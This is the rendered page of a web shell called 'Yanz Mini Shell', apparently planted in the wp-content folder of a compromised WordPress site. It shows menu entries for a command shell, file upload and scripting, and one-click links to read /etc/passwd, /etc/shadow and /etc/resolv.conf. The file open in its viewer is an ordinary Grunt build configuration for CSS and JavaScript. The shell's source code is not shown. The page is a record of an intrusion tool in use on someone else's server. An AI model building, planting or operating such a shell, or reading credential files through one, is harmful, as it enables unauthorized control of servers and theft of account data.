Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
vdataprod
public_html
wp-content
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
module.exports = function(grunt) { // Project configuration. grunt.initConfig({ concat_css: { options: { // Task-specific options go here. }, all: { src: "themes/tema-dp/skin/css/*.css", dest: "themes/tema-dp/skin/css/style.css" }, }, autoprefixer: { options: { safe: true }, your_target: { src: 'themes/tema-dp/skin/css/style.css' }, }, cssmin: { target: { files: [{ expand: true, src: 'themes/tema-dp/skin/css/style.css', ext: '.min.css' }] } }, concat: { options: { separator: ';', }, dist: { src: ['themes/tema-dp/skin/js/*.js'], dest: 'themes/tema-dp/skin/js/js_concat.js', }, }, uglify: { build: { files: [{ expand: true, src: 'themes/tema-dp/skin/js/js_concat.js', ext: '.min.js' }] } } }); // Load the plugin that provides the "uglify" task. grunt.loadNpmTasks('grunt-concat-css'); grunt.loadNpmTasks('grunt-autoprefixer'); grunt.loadNpmTasks('grunt-contrib-cssmin'); grunt.loadNpmTasks('grunt-contrib-concat'); grunt.loadNpmTasks('grunt-contrib-uglify'); // Default task(s). grunt.registerTask('default', ['concat_css','autoprefixer','cssmin','concat','uglify']); };
Free Space : 108567777280 Byte